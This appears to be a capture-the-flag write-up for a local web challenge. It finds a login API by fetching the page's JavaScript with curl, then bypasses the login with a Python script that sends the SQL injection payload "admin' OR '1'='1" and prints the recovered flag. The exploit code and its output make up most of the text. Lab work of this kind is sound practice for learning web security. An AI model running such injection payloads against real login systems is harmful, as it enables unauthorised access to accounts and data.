Login request identification
Download website:
curl localhost:8000 >> web.txt
Found this in it:
<script src="/static/script.js" type="text/javascript"></script>
Download /static/script.js:
curl http://localhost:8000/static/script.js
Found login request:
$.ajax('/api/v1/login/', {
    method: 'POST',
    data: JSON.stringify(dat),
    dataType: "json",
    contentType: "application/json",
}).done(function(res) {
    if (res['status'] == 'success'){
        $("#stat").html('<b>Successful Login. Here is your flag: ');
        $("#stat").append(res['flag']);
        $("#stat").append('</b>');
    }
});
SQL injection on /api/v1/login/
Then I went for a Python script to try a basic SQL injection:
import requests
import json
# Target URL
url = "http://localhost:8000/api/v1/login/"
# Malicious payload for SQL Injection
payload = {
    "username": "admin' OR '1'='1",  # Always true condition
    "password": "anything"  # Irrelevant due to SQLi
}
# Send the request
response = requests.post(url, headers={"Content-Type": "application/json"}, data=json.dumps(payload))
# Check response
if response.status_code == 200:
    try:
        data = response.json()
        if "flag" in data:
            print("[+] Flag found: ", data["flag"])
        else:
            print("[-] Login successful but no flag found.")
    except json.JSONDecodeError:
        print("[-] Invalid JSON response. Possible error page returned.")
else:
    print(f"[-] Server returned status code {response.status_code}. Possible error.")
$ python3 script03.py
[+] Flag found:  ECSC{889b71de2017ca8074f49d3f853950e147591b38}